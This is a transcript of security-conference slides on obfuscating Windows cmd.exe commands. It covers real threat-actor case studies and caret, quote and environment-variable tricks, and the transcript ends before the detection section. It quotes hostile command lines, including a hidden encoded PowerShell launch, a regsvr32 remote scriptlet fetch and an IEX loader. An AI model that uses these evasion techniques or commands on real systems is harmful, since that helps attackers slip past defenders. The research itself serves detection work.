invoke-dosfuscation - hack in paris · • invoke-dosfuscation handles all layers •...
TRANSCRIPT
![Page 1: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/1.jpg)
Daniel Bohannon
@danielhbohannon
Senior Applied Security Researcher
Mandiant, A FireEye Company
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
Invoke-DOSfuscationTechniques FOR %F IN (-style) DO (S-level CMD Obfuscation)
http://insights.looloo.com/wp-content/uploads/2016/10/Latte-Art-in-Manila-Featured-FB.jpg
![Page 2: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/2.jpg)
• Daniel Bohannon
• Title :: Senior Applied Security Researcher
• Team :: Advanced Practices Team @ Mandiant/FireEye
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Projects
• Invoke-Obfuscation & Invoke-CradleCrafter
• Revoke-Obfuscation (w/@Lee_Holmes)
• Invoke-DOSfuscation
2
C:\> """who""am"i
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 3: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/3.jpg)
• Case studies and examples are drawn from our experiences and
activities working for a variety of customers, and do not represent our
work for any one customer or set of customers. In many cases, facts
have been changed to obscure the identity of our customers and
individuals associated with our customers.
3
DISCLAIMER:
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 4: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/4.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
4 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 5: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/5.jpg)
OUTLINE
C:\> State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
5 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 6: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/6.jpg)
• Why Obfuscate?
• Evade static (and some dynamic) detections
• Increase work for defenders
• How Extensive?
• Some obfuscation framework exists for almost
any scripting language that attackers like to use
• Slowing down?
• Not any time soon (but I may be biased)
6
State of Obfuscation [Red Team]
Not The Droid You're Looking For
https://i.imgur.com/lG8bRQe.jpg
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 7: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/7.jpg)
• Additional Host-Based Visibility
• AMSI: Antimalware Scan Interface
• ETW: Event Tracing (Windows)
• Signature-less Detection Approaches
• Revoke-Obfuscation (AST-based
PowerShell obfuscation detection
framework)
• Room for improvement?
• Absolutely, because attackers are responding by…
7
State of Obfuscation [Blue Team]
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 8: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/8.jpg)
• Choosing softer targets
• Disabling defensive visibility
• AMSI, ETW, Anti-forensics
• Using languages that do not provide good visibility
• JavaScript (quieter than PS, but still AMSI)
• AMSI visibility if run via Windows Script Host (VBS or
JScript)
• C# (msbuild.exe all the things)
• Custom binaries (b/c whitelisting still uncommon)
8
State of Obfuscation [Attacker Response]
http://www.syslog.com/~jwilson/pics-i-like/kurios119.jpg
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 9: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/9.jpg)
• What is this talk?
• NOT PowerShell (well, not entirely)
9
State of Obfuscation [My Response]
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 10: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/10.jpg)
• What is this talk?
• NOT PowerShell (well, not entirely)
• Cmd.exe obfuscation
• Cmd.exe visibility
• Command line arguments
• Parent/child process relationships
• Source of action on registry, files, etc.
But why an entire framework for cmd.exe obfuscation?
10
State of Obfuscation [My Response]
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 11: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/11.jpg)
OUTLINE
State of the Union Obfuscation
C:\> Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
11 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 12: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/12.jpg)
• June 30, 2017
• Co-authored blog post with Nick Carr
(@itsreallynick)
• Outlines three different obfuscation techniques that
MANDIANT consultants identified three threat
actors using
• Feb 2017 :: FIN8
• Apr 2017 :: APT32 (OceanLotus, Vietnam)
• Jun 2017 :: FIN7 (Carbanak)
12
Obfuscation in the Wild
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 13: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/13.jpg)
13
Case Study #1: FIN8
cmd /c echo %_MICROSOFT_UPDATE_CATALOG% | %_MICROSOFT_UPDATE_SERVICE%
$s=$Env:_CT;$o='';$l=$s.length;$i=$Env:_PA%$l;while($o.length -ne$l){$o+=$s[$i];$i=($i+$Env:_KE)%$l}iex($o)
powershell -
• February 2017
• Process-level environment variables + PowerShell StdIn (launched from macro)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 14: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/14.jpg)
• April 2017
• Caret and un-paired double quotes in regsvr32.exe arguments
• /i:^h^t^t^p (does not show up in regsvr32.exe arguments)
• /i:"h"t"t"p (DOES show up in regsvr32.exe arguments – must be even number of quotes)
14
Case Study #2: APT32 (OceanLotus)
Host Investigative Platform (HIP) capturing real-time attacker activity during a MANDIANT incident response engagement for APT32 activity
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 15: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/15.jpg)
• June 2017
• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document
• Process-level environment variables + cmd.exe StdIn
• JavaScript encoding & concatenation:
• "Wor"+"d.Application" and [String.fromCharCode(101)+'va'+'l']
15
Case Study #3: FIN7 (Carbanak)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 16: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/16.jpg)
16
Case Study #3: FIN7 (Carbanak)
https://i.imgur.com/tZpnpiI.gif
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 17: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/17.jpg)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
17
Case Study #3: FIN7 (Carbanak)
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 18: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/18.jpg)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
18
Case Study #3: FIN7 (Carbanak)
Process-level env var Process-level env var
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 19: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/19.jpg)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
19
Case Study #3: FIN7 (Carbanak)
Garbage delimiter
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 20: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/20.jpg)
• cmd.exe /c set x=wsc@ript /e:jscript … echo %x%|cmd
20
Case Study #3: FIN7 (Carbanak)
Garbage delimiter
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 21: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/21.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd
21
Case Study #3: FIN7 (Carbanak)
Garbage delimiter
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 22: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/22.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd
22
Case Study #3: FIN7 (Carbanak)
Garbage delimiter Delimiter removal
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 23: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/23.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x %|cmd
23
Case Study #3: FIN7 (Carbanak)
Garbage delimiter Delimiter removal
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 24: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/24.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd
24
Case Study #3: FIN7 (Carbanak)
Garbage delimiter Delimiter removal
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 25: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/25.jpg)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd
25
Case Study #3: FIN7 (Carbanak)
https://media.giphy.com/media/l4Jz3a8jO92crUlWM/giphy.gif
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 26: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/26.jpg)
26
Case Study #3: FIN7 (Carbanak)
• Timeline
• Wed :: June 28, 2017 – Nick Carr (@itsreallynick)
finds FIN7 testing payload
• Thu :: June 29, 2017 – We write blog post
• Fri :: June 30, 2017 – We publish blog post
• Sat/Sun :: July 1-2, 2017 – I write and release POC:
Out-FINcodedCommand
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 27: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/27.jpg)
27
Case Study #3: FIN7 (Carbanak)
"Is there more here?"
• Timeline
• Wed :: June 28, 2017 – Nick Carr (@itsreallynick)
finds FIN7 testing payload
• Thu :: June 29, 2017 – We write blog post
• Fri :: June 30, 2017 – We publish blog post
• Sat/Sun :: July 1-2, 2017 – I write and release POC:
Out-FINcodedCommand
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 28: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/28.jpg)
28
Implications of This Research
• These obfuscation techniques affect:
• Dynamic detections
• Arguments, parent/child relationship, env var, stdin
• Static detections
• All of the above + so much more
• CFP submissions ☺
https://memegenerator.net/img/images/600x600/2729805/willy-wonka.jpg
PLEASE, TELL ME MORE
ABOUT YOUR TESTING
SO YOU THINK EVENT LOGS
DEOBFUSCATE CMD ARGS
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 29: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/29.jpg)
29
Implications of This Research
cmd.exe /c "echo Invoke-DOSfuscation"
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 30: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/30.jpg)
30
Implications of This Research
cmd.exe /c "set O=fuscation&set B=oke-
DOS&&set D=echo Inv&&call %D%%B%%O%"
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 31: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/31.jpg)
31
Implications of This Research
cm%windir:~ -4, -3%.e^Xe,;^,/^C",;,S^Et ^
^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-D^OS&&,;,s^Et^
^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o^%"
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 32: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/32.jpg)
32
Implications of This Research
FOR /F "delims=il tokens=+4" %Z IN ('assoc .cdxml') DO %Z
,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-
D^OS&&,;,s^Et^ ^ d^=ec^ho
I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o%"
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 33: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/33.jpg)
33
Implications of This Research
^F^oR , , , , , ; ; /^f ; ; ; ; ; , " delims=il
tokens= +4 " ; ; ; , , , , %Z ; , , , , ^In , , ; ; , ,
, ( , ; ; ; ' , , , , , ; ^^a^^S^^s^^oC ; , , , , ;
.c^^d^^xm^^l ' ; , , , , ) , , , , ; , ^d^o , , , , , , ,
%Z , ; ^ ,/^C" , ; , S^Et ^ ^o^=fus^cat^ion& , ; , ^se^T
^ ^ ^B^=o^ke-D^OS&& , ; , s^Et^ ^ d^=ec^ho I^nv&& ,
; , C^Al^l , ; , ^ %^D%^%B%^%o%"
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 34: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/34.jpg)
34
Implications of This Research – HANG ON TIGHT
http://photos.motogp.com/2015/07/16/sunday-rider3---ross-noble_0.big.jpg
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 35: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/35.jpg)
35
Implications of This Research – HANG ON TIGHT AS WE STACK
http://photos.motogp.com/2015/07/16/sunday-rider3---ross-noble_0.big.jpg https://www.thesun.co.uk/wp-content/uploads/2016/04/1802881.main_image.jpg
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 36: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/36.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
C:\> Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
36 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 37: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/37.jpg)
• Rename/copy cmd.exe
• Cmd.exe substitutes (kind of)
• forfiles.exe (@vector_sec)
• pcalua.exe
• scriptrunner.exe (@KyleHanslovan -- Win10+)
37
Whose Binary is it Anyway: Obfuscating Binary Names
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 38: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/38.jpg)
• Rename/copy cmd.exe
• Cmd.exe substitutes (kind of)
• forfiles.exe (@vector_sec)
• pcalua.exe
• scriptrunner.exe (@KyleHanslovan -- Win10+)
• https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2
• Syntactical obfuscation of legitimate binary name?
38
Whose Binary is it Anyway: Obfuscating Binary Names
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 39: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/39.jpg)
• Env var encoding
• Nothing new
• Resolves on command line
39
Whose Binary is it Anyway: Obfuscating Binary Names
C:\> %ProgramData:~0,1%%ProgramData:~9,2%
CmD
C:\> %ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1%
Powershell
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo %ProgramData:~0,1%%ProgramData:~9,2%
CmD
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 40: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/40.jpg)
• Something that does NOT resolve on the command line (i.e. internal commands)
• SET
• ASSOC
• FTYPE
40
Whose Binary is it Anyway: Obfuscating Binary Names
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 41: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/41.jpg)
• Using SET to produce the string PowerShell
41
Whose Binary is it Anyway: Obfuscating Binary Names
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 42: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/42.jpg)
• Using SET to produce the string PowerShell
42
Whose Binary is it Anyway: Obfuscating Binary Names
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
Required (case-sensitive) delimiters are: s and \
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 43: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/43.jpg)
• Using SET to produce the string PowerShell
43
Whose Binary is it Anyway: Obfuscating Binary Names
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
1 2 3 4 5 6 7 8 9 10 11 12 13
Required (case-sensitive) delimiters are: s and \
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 44: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/44.jpg)
• Using SET to produce the string PowerShell
44
Whose Binary is it Anyway: Obfuscating Binary Names
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
1 2 3 4 5 6 7 8 9 10 11 12 13
cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a"
Required (case-sensitive) delimiters are: s and \
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 45: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/45.jpg)
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
C:\> Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
45 COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 46: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/46.jpg)
• Typically more useful for evading static analysis detections rather than
dynamic detections
• Caret escape character (^)
• Double quotes, evenly balanced ("")
• Encapsulating parentheses
• Leading & trailing special characters
• Standard input argument hiding
46
Deep Dive: Character Insertion Obfuscation
"C:\WINDOWS\system32\cmd.exe" /c
P^o^w^e^r^S^h^e^l^l^.^e^x^e^ -NoExit -Exec Bypass -EC
IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHk…
regsvr32.exe /s /n /u /i:"h"t"t"p://<REDACTED>.jpg scrobj.dll
,cmd;/ccalc
cmd /c echo calc|cmd
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 47: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/47.jpg)
• Typically more useful for evading static analysis detections rather than
dynamic detections
• Nonexistent env vars (batch files)
• https://marcin-chwedczuk.github.io/obfuscating-windows-batch-files
• Custom env vars
• Existing env vars
47
Deep Dive: Character Insertion Obfuscation
..\..\..\WINDOWS\system32\cmd.exe /V /K set p=p&&!p!owershell
-w hidden -c "IEX ((('Q0zF='+'Q0z'+'env:T'+'emp+'+'zARYUEyjv'…
echo "Find Evil!" → ec%a%ho "Fi%b%nd Ev%c%il!"
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo
%ProgramData:~0,1%%ProgramData:~9,2%
CmD
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 48: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/48.jpg)
48
Deep Dive: Character Insertion Obfuscation
• Out-FINcodedCommand POC
• A few binary syntax options with
environment variable character substitution
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
![Page 49: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/49.jpg)
49
Deep Dive: Character Insertion Obfuscation
